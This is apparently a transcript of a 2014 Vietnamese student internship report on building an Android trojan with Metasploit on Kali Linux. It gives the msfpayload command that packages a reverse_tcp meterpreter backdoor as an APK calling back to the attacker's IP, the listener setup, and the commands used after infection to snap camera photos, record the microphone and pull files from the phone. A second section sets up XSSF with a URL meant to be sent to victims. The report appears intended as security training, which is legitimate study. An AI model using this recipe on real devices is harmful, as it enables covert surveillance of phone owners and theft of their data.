Cách tạo mã độc trên kali linux và triển khai trên android ảo

20
BÁO CÁO THỰC TẬP Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài Sinh viên thực hiện :Nguyễn Hoàng Thạch GVHD: Võ Đỗ Thng TP.HCM, ngày 13 tháng 7 năm 2014

Transcript of Cách tạo mã độc trên kali linux và triển khai trên android ảo

BÁO CÁO THỰC TẬP

Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ

liệu như danh sách contact, tin nhắn trên điện thoại sử

dụng Android và gửi ra ngoài

Sinh viên thực hiện :Nguyễn Hoàng Thạch

GVHD: Võ Đỗ Thắng

TP.HCM, ngày 13 tháng 7 năm 2014

Tạo mã độc trên Kali Linux để xâm nhập Android

I.Tạo lập Backdoor

Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở payload

lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network

như sau:

Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware

Bấm vào Network Adapter và chọn NAT:Used to share the host’s IP address

Bấm vào Edit -> Virtual Network Editor...

Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật

Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android

Đầu tiên mở terminal và gõ dòng lệnh

msfpayload android/meterpreter/reverse_tcp lhost=192.168.220.128 lport=8080 R >

/root/Desktop/app.apk

192.168.220.128 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP của máy Kali

8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng

Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp backdoor.

Tiếp theo, gõ lệnh msfconsole

Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên.

set lport 8080 – nhập port giống với port khi tạo payload ở trên.

Exploit

Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.

Thử với một máy Sony Xperia Z giả lập, tải về app.apk, cài đặt và mở lên được giao diện như dưới, nhấp vào

nút reverse_tcp:

Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:

Để xem thông tin về máy, nhập lệnh SysInfo

Sử dụng camera:

Để xem danh sách camera, nhập webcam_list

Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở

phần trước. Ví dụ như sau:

File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root của máy

Ghi âm

Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy

Lấy file từ sd card

Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục

Ví dụ ở đây, ta tải file app.apk trong thư mục download của sdcard

Dùng lệnh cd /sdcard/Download để vào thư mục

Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh

Download App.apk

Và file này sẽ được tải về thư mục root của máy Kali

II.XSSF

Để cài đặt XSSF cho kali sử sụng 3 câu lệnh:

msfupdate

cd /opt/metasploit/apps/pro/msf3

svn export http://xssf.googlecode.com/svn/trunk ./ --force

Tiếp tục là lệnh

XSSF LOG PAGE : http://192.168.220.128:80/xssf/gui.html?guipage=main

Địa chỉ gửi cho nạn nhân là: http://192.168.220.128:80/xssf/test.html

Kết quả trên terminal:

Lệnh xssf_victim dùng để hiện thong tin nạn nhân

Lệnh xssf_information dùng để hiện thông tin nạn nhân chi tiết hơn

Tiếp tục lệnh search auxiliary/xssf

Refesh lại lại trang web sẽ thấy thông tin nạn nhân

Tiếp theo sử dụng lệnh alert để cảnh báo nạn nhân: